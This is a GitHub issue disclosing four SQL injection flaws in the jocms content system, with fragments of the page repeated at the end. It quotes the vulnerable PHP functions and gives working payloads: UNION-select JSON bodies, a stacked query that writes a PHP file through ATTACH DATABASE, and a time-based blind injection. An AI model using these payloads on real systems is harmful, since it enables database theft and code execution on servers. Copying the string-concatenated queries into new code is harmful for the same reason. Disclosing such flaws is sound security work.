Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
In jocms/apps/mask/inc/mask.php line 18~23:
$decoded = jo_json_check(); if($decoded == false){ throw new Exception($JO_LANG['ERR_INP_JSON']); } $mask = jo_get_masks($decoded["id"])[0];
function jo_json_check() will return JSON data submitted by users:
jo_json_check()
function jo_json_check(){ if(strcasecmp($_SERVER['REQUEST_METHOD'], 'POST') != 0){ return false; } $contentType = isset($_SERVER["CONTENT_TYPE"]) ? trim($_SERVER["CONTENT_TYPE"]) : ''; if(strpos(strtolower($contentType), 'application/json') != 0){ return false; } $content = trim(file_get_contents("php://input")); $decoded = json_decode($content, true); if(!is_array($decoded)){ return false; } return $decoded; }
then jo_get_masks() will execute SQL statement.
jo_get_masks()
function jo_get_masks($id){ $condition = ""; $masks = []; if($id != "all"){ $condition = " WHERE id='".$id."' "; }else{ $condition = " WHERE type='mask' "; } $code; $handle = jocms_db_link(); $result = $handle->query("SELECT * FROM masks ".$condition." ORDER BY name"); while($output = $result->fetchArray()){ $masks[] = $output; } return $masks; }
There is no filtering for the input parameter,so we can use single quotation marks to close and inject.payload:
{"id":"1'union select 1,'hacked',3,sqlite_version(),5--"}
In jocms/apps/mask/inc/getmask.php line 16~21
$decoded = jo_json_check(); if($decoded == false){ throw new Exception($JO_LANG['ERR_INP_JSON']); } $masks = jo_get_masks($decoded["content"]);
It's similar to the one above. Just change the id to content.payload:
id
content
{"content":"1'union select 1,'hacked',3,sqlite_version(),5--"}
In jocms/apps/mask/mask.php line 19~30
if(isset($_POST["saved"])){ if(isset($_POST["id"]) AND isset($_POST["name"]) AND isset($_POST["code"])){ $code = $_POST["code"]; $code = str_replace(array("\r\n", chr(10).chr(13), "\r", "\n", PHP_EOL, chr(10), chr(13)),'--jo:r--', $code); $domobject = str_get_html ($code); $attr = "data-jo-content"; $mask = $domobject->find("*", 0); $mask->$attr = "noneditable"; $code = str_replace("--jo:r--", PHP_EOL, $domobject->save()); jo_set_mask($_POST["id"], $_POST["name"], "mask", $code); } }
user controlled parameters will pass into the function jo_set_mask().
In jocms/core/inc/db.php line 253:
function jo_set_mask($id, $name, $type, $code){ $handle = jocms_db_link(); if($id != 0){ $return = $handle->exec("UPDATE masks SET name='".$name."', code='".$code."' WHERE id='".$id."'"); $return = $id; }else{ $return = $handle->exec("INSERT INTO masks(name,type,code) VALUES ('".$handle->escapeString($name)."','".$handle->escapeString($type)."','".$handle->escapeString($code)."')"); $return = $handle->lastInsertRowid(); } return $return; }
No filtering for parameters so we can execute any SQL statement.
we can write a php code by this:
saved=a&id=1';ATTACH DATABASE 'shell.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo()?>');&name=xxxxxxx&code=xxxxxxxx
visit:
In jocms/apps/mask/mask.php line 31~33:
if(isset($_GET["deleted"]) AND isset($_GET["id"])){ jo_delete_mask($_GET["id"]); }
follow function jo_delete_mask():
function jo_delete_mask($id){ $handle = jocms_db_link(); $result = $handle->query("DELETE FROM masks WHERE id='".$id."'"); return $result; }
No filtering for parameter id,so we can inject,use time based injection:
?deleted=x&id=0'or+case+when(1=2)+then(randomblob(1000000000))else(0)end+or+'
The text was updated successfully, but these errors were encountered:
Implemented SQL prepared statements - injection mitigation
6ba8031
Fixes mxgbr#6
Successfully merging a pull request may close this issue.
1.SQL Injection vulnerability
In jocms/apps/mask/inc/mask.php line 18~23:
function
jo_json_check()will return JSON data submitted by users:then
jo_get_masks()will execute SQL statement.There is no filtering for the input parameter,so we can use single quotation marks to close and inject.payload:
2.SQL Injection vulnerability
In jocms/apps/mask/inc/getmask.php line 16~21
It's similar to the one above. Just change the
idtocontent.payload:3.SQL Injection vulnerability
In jocms/apps/mask/mask.php line 19~30
user controlled parameters will pass into the function jo_set_mask().
In jocms/core/inc/db.php line 253:
No filtering for parameters so we can execute any SQL statement.
we can write a php code by this:
visit:
4.SQL Injection vulnerability
In jocms/apps/mask/mask.php line 31~33:
follow function jo_delete_mask():
No filtering for parameter id,so we can inject,use time based injection:
The text was updated successfully, but these errors were encountered: